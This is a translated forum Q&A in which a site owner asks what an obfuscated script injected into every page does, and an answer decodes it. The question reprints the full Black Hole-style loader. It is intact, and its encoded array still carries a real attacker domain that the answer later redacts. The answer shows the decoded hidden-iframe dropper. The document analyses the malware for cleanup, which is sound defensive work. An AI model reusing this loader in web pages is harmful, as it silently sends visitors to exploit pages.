AVG 对网站发出的“Black Hole Exploit”警告

时间:2011-10-01 13:14:46

标签: javascript virus

我为一位亲戚运营一个网站,他们的 AVG 在访问该站时弹出了“EXPLOIT BLACK HOLE EXPLOIT”之类的警告。这种警告通常是在网站被植入恶意代码时出现的,我认为网站确实已被感染。我在每一个页面上都发现了下面这一行代码,它不是我放上去的:http://pastebin.com/sJXgw8LX(是的,整段就是一行;下面的换行只是显示时折行造成的)。

<body><!--398c3d--><script>/* Injected Black Hole-style loader, kept verbatim as evidence. Do NOT run it.
   How it unpacks (from the statements below):
   - `new function(){return 2;}` yields an object (the primitive return value is
     ignored), so `+b` is NaN and `!+b` is true: a bogus enumerable property
     String.prototype.test = 'harC' is added.  The for-in over the string literal
     then enumerates that inherited property and sets m = 'harC'.
   - The two try/catch blocks only initialise ss and s if the calls throw the way
     a real engine does (undefined method; eval of an undeclared name); s ends up
     as String["fromCharCode"], assembled from "fr"+"omC"+m+"od"+"e".
   - Object.prototype.asd / document.createTextNode('321') are further checks that
     a real DOM is present before x is computed.
   - d and d2 are two Dates 2 ms apart, so x === -2 and every array entry is
     (charCode - 2): add 2 to each constant to recover the character.
   - The loop rebuilds the clear text in ss and hands it to eval(); the result is
     the hidden-iframe dropper shown decoded in the answer further down.
   The <!--398c3d--> ... <!--/398c3d--> markers bracket the injected span and are a
   usable indicator when grepping the site.  The original is a single line; the
   line breaks in this listing are display artefacts. */
b=new function(){return 2;};if(!+b)String.prototype.test='harC';for(i in $='esrhserh')if(i=='te'+'st')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document['c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d'+'e']('321');if(a.data==321)x=-1*(d-d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+39,-x+121,-x+7,-x+7,-x+7,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+57,-x+7,-x+7,-x+123,-x+30,-x+99,-x+106,-x+113,-x+99,-x+30,-x+121,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+117,-x+112,-x+103,-x+114,-x+99,-x+38,-x+32,-x+58,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+30,-x+113,-x+112,-x+97,-x+59,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+106,-x+104,-x+112,-x+114,-x+109,-x+44,-x+97,-x+109,-x+107,-x+45,-x+113,-x+115,-x+114,-x+112,-x+95,-x+45,-x+103,-x+108,-x+44,-x+97,-x+101,-x+103,-x+61,-x+98,-x+99,-x+100,-x+95,-x+115,-x+106,-x+114,-x+37,-x+30,-x+117,-x+103,-x+98,-x+114,-x+102,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+113,-x+114,-x+119,-x+106,-x+99,-x+59,-x+37,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+56,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+57,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+56,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+57,-x+106,-x+99,-x+100,-x+114,-x+56,-x+46,-x+57,-x+114,-x+109,-x+110,-x+56,-x+46,-x+57,-x+37,-x+60,-x+58,-x+45,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+60,-x+32,-x+39,-x+57,-x+7,-x+7,-x+123,-x+7,-x+7,-x+100,-x+115,-x+
108,-x+97,-x+114,-x+103,-x+109,-x+108,-x+30,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+121,-x+7,-x+7,-x+7,-x+116,-x+95,-x+112,-x+30,-x+100,-x+30,-x+59,-x+30,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+97,-x+112,-x+99,-x+95,-x+114,-x+99,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+38,-x+37,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+113,-x+112,-x+97,-x+37,-x+42,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+106,-x+104,-x+112,-x+114,-x+109,-x+44,-x+97,-x+109,-x+107,-x+45,-x+113,-x+115,-x+114,-x+112,-x+95,-x+45,-x+103,-x+108,-x+44,-x+97,-x+101,-x+103,-x+61,-x+98,-x+99,-x+100,-x+95,-x+115,-x+106,-x+114,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+59,-x+37,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+59,-x+37,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+106,-x+99,-x+100,-x+114,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+114,-x+109,-x+110,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+117,-x+103,-x+98,-x+114,-x+102,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+1
19,-x+37,-x+39,-x+89,-x+46,-x+91,-x+44,-x+95,-x+110,-x+110,-x+99,-x+108,-x+98,-x+65,-x+102,-x+103,-x+106,-x+98,-x+38,-x+100,-x+39,-x+57,-x+7,-x+7,-x+123];/* rebuild the clear-text script one char at a time, then execute it */for(i=0;i<n.length;i++)ss+=s(eval("n"+"[i"+"]"));eval(ss);</script><!--/398c3d-->

这段代码到底做了什么?

1 个答案:

答案 0 :(得分:3)

以下是解码后(即最终被 eval 执行的)JavaScript:

// Entry point of the decoded dropper.  If a <body> element already exists, build
// the iframe through the DOM (iframer); otherwise fall back to document.write()
// so the iframe is still emitted while the page is being parsed.  In the infected
// page the injected <script> sits directly after the <body> tag, so the first
// branch is the one that normally runs.
if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    // Same hidden 10x10 iframe that iframer() builds, emitted as raw markup.
    // Host redacted by the answerer; in the original sample it is the same host
    // and path as in iframer().  '/sutra/in.cgi?default' is a useful string to
    // grep for when cleaning the site.
    document.write("<iframe src='http://xxxxxxx/sutra/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
// Appends an invisible 10x10 iframe to <body>, pointing every visitor's browser
// at the attacker's URL (presumably a redirector to a Black Hole exploit-kit
// landing page, which is what AVG is naming -- the final page is not shown here).
// Nothing is user-visible: visibility:hidden plus absolute positioning at 0,0.
// Removing this line from the pages is not enough on its own; the injection
// vector (stolen FTP/CMS credentials, a vulnerable plugin, ...) has to be found
// and closed, or the code will come back.
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://xxxxx/sutra/in.cgi?default'); // host redacted by the answerer
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    // Attach to the first <body>; the caller has already checked it exists.
    document.getElementsByTagName('body')[0].appendChild(f);
}

我对实际的主机名做了打码处理,以免造成进一步危害。在那个页面上还有另一段半混淆的 JavaScript,它会把浏览器重定向到同一主机上的另一个页面,很可能会试图让访问者的浏览器下载某些东西。我没有继续追踪代码到最终目的地。